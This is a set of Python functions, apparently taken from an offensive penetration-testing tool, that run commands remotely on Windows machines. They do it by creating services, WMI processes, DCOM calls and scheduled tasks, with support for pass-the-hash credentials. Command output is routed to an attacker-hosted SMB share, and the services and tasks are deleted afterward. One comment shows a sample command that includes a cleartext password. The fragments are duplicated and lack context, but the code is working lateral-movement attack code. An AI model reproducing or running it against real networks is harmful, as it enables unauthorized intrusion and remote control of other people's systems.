def execute_fileless(self, data): self.__output = gen_random_string(6) self.__batchFile = gen_random_string(6) + '.bat' local_ip = self.__rpctransport.get_socket().getsockname()[0] if self.__retOutput: command = self.__shell + data + ' ^> \\\\{}\\{}\\{}'.format(local_ip, self.__share_name, self.__output) else: command = self.__shell + data with open((cfg.TMP_PATH / self.__batchFile), 'w') as batch_file: batch_file.write(command) logging.debug('Hosting batch file with command: ' + command) command = self.__shell + '\\\\{}\\{}\\{}'.format(local_ip,self.__share_name, self.__batchFile) #adding creds gets past systems disallowing guest-auth command = '%COMSPEC% /Q /c "net use /persistent:no \\\\{}\\{} /user:{} {} & '.format(local_ip, self.__share_name, self.__username, self.__password) + command logging.debug('Command to execute: ' + command) logging.debug('Remote service {} created.'.format(self.__serviceName)) resp = scmr.hRCreateServiceW(self.__scmr, self.__scHandle, self.__serviceName, self.__serviceName, lpBinaryPathName=command, dwStartType=scmr.SERVICE_DEMAND_START) service = resp['lpServiceHandle'] try: logging.debug('Remote service {} started.'.format(self.__serviceName)) scmr.hRStartServiceW(self.__scmr, service) except: pass logging.debug('Remote service {} deleted.'.format(self.__serviceName)) scmr.hRDeleteService(self.__scmr, service) scmr.hRCloseServiceHandle(self.__scmr, service) self.get_output_fileless()
def execute_fileless(self, data): self.__output = gen_random_string(6) local_ip = self.__smbconnection.getSMBServer().get_socket( ).getsockname()[0] commandData = self.__shell + data + ' 1> \\\\{}\\{}\\{} 2>&1'.format( local_ip, self.__share_name, self.__output) #commandData = data + ' 1> \\\\{}\\{}\\{} 2>&1'.format(local_ip, # self.__share_name, # self.__output) #adding creds gets past systems disallowing guest-auth # cmd.exe /Q /c "net use \\10.10.33.200\CAJKY /savecred /p:no /user:agrande User!23 & cmd.exe /Q /c whoami 1> \\10.10.33.200\CAJKY\QYkvxb 2>&1 command = self.__shell + '"net use * /d /y & ' command += self.__shell + 'net use \\\\{}\\{} /savecred /p:no /user:{} {} & {} "'.format( local_ip, self.__share_name, self.__username, self.__password, commandData) #command += 'net use \\\\{}\\{} /savecred /p:no /user:{} {}"'.format(local_ip, # self.__share_name, # self.__username, # self.__password # ) logging.debug('wmi Executing_fileless command: {}'.format(command)) self.__win32Process.Create(command, self.__pwd, None) self.get_output_fileless()
def execute_remote(self, data): self.__output = '\\Windows\\Temp\\' + gen_random_string(6) command = self.__shell + data if self.__retOutput: command += ' 1> ' + '\\\\127.0.0.1\\%s' % self.__share + self.__output + ' 2>&1' logging.debug('wmi Executing_remote command: ' + command) self.__win32Process.Create(command, self.__pwd, None) self.get_output_remote()
def execute_fileless(self, data): self.__output = gen_random_string(6) local_ip = self.__smbconnection.getSMBServer().get_socket().getsockname()[0] command = self.__shell + data + ' 1> \\\\{}\\{}\\{} 2>&1'.format(local_ip, self.__share_name, self.__output) #adding creds gets past systems disallowing guest-auth command = self.__shell + '"net use \\\\{}\\{} /p:no /user:{} {} & {} "'.format(local_ip, self.__share_name, self.__username, self.__password, command) logging.debug('wmi Executing_fileless command: {}'.format(command)) self.__win32Process.Create(command, self.__pwd, None) self.get_output_fileless()
def execute_fileless(self, data): self.__output = gen_random_string(6) local_ip = self.__smbconnection.getSMBServer().get_socket( ).getsockname()[0] command = self.__shell + data + ' 1> \\\\{}\\{}\\{} 2>&1'.format( local_ip, self.__share_name, self.__output) logging.debug('wmi Executing_fileless command: {}'.format(command)) self.__win32Process.Create(command, self.__pwd, None) self.get_output_fileless()
def execute_remote(self, data): self.__output = gen_random_string(6) local_ip = self.__smbconnection.getSMBServer().get_socket( ).getsockname()[0] command = '/Q /c ' + data if self.__retOutput is True: command += ' 1> ' + '\\\\{}\\{}\\{}'.format( local_ip, self.__share_name, self.__output) + ' 2>&1' dispParams = DISPPARAMS(None, False) dispParams['rgdispidNamedArgs'] = NULL dispParams['cArgs'] = 4 dispParams['cNamedArgs'] = 0 arg0 = VARIANT(None, False) arg0['clSize'] = 5 arg0['vt'] = VARENUM.VT_BSTR arg0['_varUnion']['tag'] = VARENUM.VT_BSTR arg0['_varUnion']['bstrVal']['asData'] = self.__shell arg1 = VARIANT(None, False) arg1['clSize'] = 5 arg1['vt'] = VARENUM.VT_BSTR arg1['_varUnion']['tag'] = VARENUM.VT_BSTR arg1['_varUnion']['bstrVal']['asData'] = self.__pwd arg2 = VARIANT(None, False) arg2['clSize'] = 5 arg2['vt'] = VARENUM.VT_BSTR arg2['_varUnion']['tag'] = VARENUM.VT_BSTR arg2['_varUnion']['bstrVal']['asData'] = command arg3 = VARIANT(None, False) arg3['clSize'] = 5 arg3['vt'] = VARENUM.VT_BSTR arg3['_varUnion']['tag'] = VARENUM.VT_BSTR arg3['_varUnion']['bstrVal']['asData'] = '7' dispParams['rgvarg'].append(arg3) dispParams['rgvarg'].append(arg2) dispParams['rgvarg'].append(arg1) dispParams['rgvarg'].append(arg0) self.__executeShellCommand[0].Invoke(self.__executeShellCommand[1], 0x409, DISPATCH_METHOD, dispParams, 0, [], []) self.get_output_fileless()
def __init__(self, host, share_name, protocol, username='', password='', domain='', hashes=None, share=None, port=445): self.__host = host self.__share_name = share_name self.__port = port self.__username = username self.__password = password self.__serviceName = gen_random_string() self.__domain = domain self.__lmhash = '' self.__nthash = '' self.__share = share self.__output = None self.__batchFile = None self.__outputBuffer = '' self.__shell = 'cmd.exe /Q /c ' self.__retOutput = False self.__rpctransport = None self.__scmr = None self.__conn = None self.__mode = 'SHARE' #self.__aesKey = aesKey #self.__doKerberos = doKerberos if hashes is not None: #This checks to see if we didn't provide the LM Hash if hashes.find(':') != -1: self.__lmhash, self.__nthash = hashes.split(':') else: self.__nthash = hashes #since we might have not passed in a pass and used a hash instead if self.__password is None: self.__password = ''
def __init__(self, host, share_name, protocol, username = '', password = '', domain = '', hashes = None, share = None, port=445): self.__host = host self.__share_name = share_name self.__port = port self.__username = username self.__password = password self.__serviceName = gen_random_string() self.__domain = domain self.__lmhash = '' self.__nthash = '' self.__share = share self.__output = None self.__batchFile = None self.__outputBuffer = '' self.__shell = '%COMSPEC% /Q /c ' self.__retOutput = False self.__rpctransport = None self.__scmr = None self.__conn = None self.__mode = 'SHARE' # need to figure out the smbserver_dir(ectory) that we can always write too #self.__aesKey = aesKey #self.__doKerberos = doKerberos if hashes is not None: #This checks to see if we didn't provide the LM Hash if hashes.find(':') != -1: self.__lmhash, self.__nthash = hashes.split(':') else: self.__nthash = hashes #since we might have not passed in a pass and used a hash instead if self.__password is None: self.__password = '' stringbinding = r'ncacn_np:%s[\pipe\svcctl]' % self.__host logging.debug('StringBinding %s'%stringbinding) self.__rpctransport = transport.DCERPCTransportFactory(stringbinding) self.__rpctransport.set_dport(self.__port) if hasattr(self.__rpctransport, 'setRemoteHost'): self.__rpctransport.setRemoteHost(self.__host) #if hasattr(self.__rpctransport,'preferred_dialect'): # self.__rpctransport.preferred_dialect(SMB_DIALECT) if hasattr(self.__rpctransport, 'set_credentials'): # This method exists only for selected protocol sequences. self.__rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash) #rpctransport.set_kerberos(self.__doKerberos, self.__kdcHost) self.__scmr = self.__rpctransport.get_dce_rpc() self.__scmr.connect() s = self.__rpctransport.get_smb_connection() # We don't wanna deal with timeouts from now on. s.setTimeout(100000) self.__scmr.bind(scmr.MSRPC_UUID_SCMR) resp = scmr.hROpenSCManagerW(self.__scmr) self.__scHandle = resp['lpScHandle']
def doStuff(self, command, fileless=False): dce = self.__rpctransport.get_dce_rpc() dce.set_credentials(*self.__rpctransport.get_credentials()) dce.connect() #dce.set_auth_level(ntlm.NTLM_AUTH_PKT_PRIVACY) dce.bind(tsch.MSRPC_UUID_TSCHS) tmpName = gen_random_string(8) tmpFileName = tmpName + '.tmp' xml = self.gen_xml(command, tmpFileName, fileless) #logging.info("Task XML: {}".format(xml)) taskCreated = False logging.info('Creating task \\%s' % tmpName) tsch.hSchRpcRegisterTask(dce, '\\%s' % tmpName, xml, tsch.TASK_CREATE, NULL, tsch.TASK_LOGON_NONE) taskCreated = True logging.info('Running task \\%s' % tmpName) tsch.hSchRpcRun(dce, '\\%s' % tmpName) done = False while not done: logging.debug('Calling SchRpcGetLastRunInfo for \\%s' % tmpName) resp = tsch.hSchRpcGetLastRunInfo(dce, '\\%s' % tmpName) if resp['pLastRuntime']['wYear'] != 0: done = True else: sleep(2) logging.info('Deleting task \\%s' % tmpName) tsch.hSchRpcDelete(dce, '\\%s' % tmpName) taskCreated = False if taskCreated is True: tsch.hSchRpcDelete(dce, '\\%s' % tmpName) if self.__retOutput: if fileless: while True: try: with open(os.path.join('/tmp', 'cmx_hosted', tmpFileName), 'r') as output: self.output_callback(output.read()) break except IOError: sleep(2) else: peer = ':'.join(map(str, self.__rpctransport.get_socket().getpeername())) smbConnection = self.__rpctransport.get_smb_connection() while True: try: #logging.info('Attempting to read ADMIN$\\Temp\\%s' % tmpFileName) smbConnection.getFile('ADMIN$', 'Temp\\%s' % tmpFileName, self.output_callback) break except Exception as e: if str(e).find('SHARING') > 0: sleep(3) elif str(e).find('STATUS_OBJECT_NAME_NOT_FOUND') >= 0: sleep(3) else: raise #logging.debug('Deleting file ADMIN$\\Temp\\%s' % tmpFileName) smbConnection.deleteFile('ADMIN$', 'Temp\\%s' % tmpFileName) dce.disconnect()